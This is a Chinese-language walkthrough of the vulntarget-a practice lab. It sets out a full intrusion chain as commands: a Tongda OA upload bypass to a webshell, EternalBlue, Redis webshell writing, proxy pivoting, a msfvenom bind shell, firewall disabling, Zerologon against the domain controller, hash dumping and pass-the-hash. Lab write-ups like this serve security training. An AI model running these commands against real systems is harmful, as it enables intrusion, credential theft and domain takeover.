[vulntarget靶场] vulntarget-a

靶场地址:https://github.com/crow821/vulntarget

拓扑结构

[vulntarget靶场] vulntarget-a_第1张图片

信息收集

主机发现

netdiscover -r 192.168.127.0/24 -i eth0

[vulntarget靶场] vulntarget-a_第2张图片

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130

[vulntarget靶场] vulntarget-a_第3张图片

访问目标80,发现为通达oa

WIN7漏洞利用

通达oa后台getshell

默认账号admin,空密码登录后台

[vulntarget靶场] vulntarget-a_第4张图片

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

[vulntarget靶场] vulntarget-a_第5张图片

点击系统管理 -> 附件管理 -> 添加存储目录

[vulntarget靶场] vulntarget-a_第6张图片

点击组织 -> 系统管理员 -> 上传附件

[vulntarget靶场] vulntarget-a_第7张图片

上传txt后缀文件,根据windows系统自动去掉.的特性,利用burp抓包修改文件后缀为.php.

[vulntarget靶场] vulntarget-a_第8张图片

文件上传到:http://192.168.127.130/im/2309/528190762.a.php,利用哥斯拉连接

[vulntarget靶场] vulntarget-a_第9张图片

[vulntarget靶场] vulntarget-a_第10张图片

CVE-2017-0144(永恒之蓝)

除了80端口的通达oa,目标还开放了445端口

msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run

[vulntarget靶场] vulntarget-a_第11张图片

内网渗透

查看win7网卡信息,发现存在另一个网段

[vulntarget靶场] vulntarget-a_第12张图片

添加路由

run post/multi/manage/autoroute

[vulntarget靶场] vulntarget-a_第13张图片

利用msf的post/windows/gather/arp_scanner模块收集内网存活主机

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

[vulntarget靶场] vulntarget-a_第14张图片

利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run

[vulntarget靶场] vulntarget-a_第15张图片

修改/etc/proxychains4.conf

[vulntarget靶场] vulntarget-a_第16张图片

利用proxychains4对内网10.0.20.99主机进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

[vulntarget靶场] vulntarget-a_第17张图片

在80端口发现phpinfo.php,得到网站根目录路径: C:/phpStudy/PHPTutorial/WWW/

[vulntarget靶场] vulntarget-a_第18张图片

redis未授权访问,写入webshell

proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 ""
save

[vulntarget靶场] vulntarget-a_第19张图片

proxychains4代理,利用哥斯拉连接

proxychains4 java -jar godzilla.jar

[vulntarget靶场] vulntarget-a_第20张图片

[vulntarget靶场] vulntarget-a_第21张图片

关闭win2016防火墙,上传msf生成的bind_shell

netsh advfirewall set allprofiles state off		#关闭防火墙

[vulntarget靶场] vulntarget-a_第22张图片

#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

[vulntarget靶场] vulntarget-a_第23张图片

利用哥斯拉上传

[vulntarget靶场] vulntarget-a_第24张图片

执行

.\shell.exe

[vulntarget靶场] vulntarget-a_第25张图片

msf上线

exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run

[vulntarget靶场] vulntarget-a_第26张图片

win2016上发现另一个网段

[vulntarget靶场] vulntarget-a_第27张图片

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

发现win2016加入域,域名:vulntarget.com

[vulntarget靶场] vulntarget-a_第28张图片

查看域内主机

net group "Domain Computers" /domain

[vulntarget靶场] vulntarget-a_第29张图片

查看域控

net group "Domain Controllers" /domain

[vulntarget靶场] vulntarget-a_第30张图片

域控ip:10.0.10.110

ping -n 1 WIN2019

[vulntarget靶场] vulntarget-a_第31张图片

CVE-2020-1472上线域控

打空域控密码,exp:https://github.com/VoidSec/CVE-2020-1472

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

[vulntarget靶场] vulntarget-a_第32张图片

dump域控hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\[email protected] -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

[vulntarget靶场] vulntarget-a_第33张图片

wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./[email protected]
net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

[vulntarget靶场] vulntarget-a_第34张图片

连接3389

proxychains4 remmina

[vulntarget靶场] vulntarget-a_第35张图片

切换动态分辨率

[vulntarget靶场] vulntarget-a_第36张图片

[vulntarget靶场] vulntarget-a_第37张图片

恢复域控密码

保存注册表

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

[vulntarget靶场] vulntarget-a_第38张图片

下载.save文件到本地解密

lget sam.save
lget security.save
lget system.save

[vulntarget靶场] vulntarget-a_第39张图片

解密

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

[vulntarget靶场] vulntarget-a_第40张图片

还原密码

proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0

[vulntarget靶场] vulntarget-a_第41张图片

再次尝试dump域控hash,发现失败,证明已经还原

proxychains4 impacket-secretsdump vulntarget.com/win2019\[email protected] -no-pass

[vulntarget靶场] vulntarget-a_第42张图片

你可能感兴趣的:(网络安全,web安全,安全)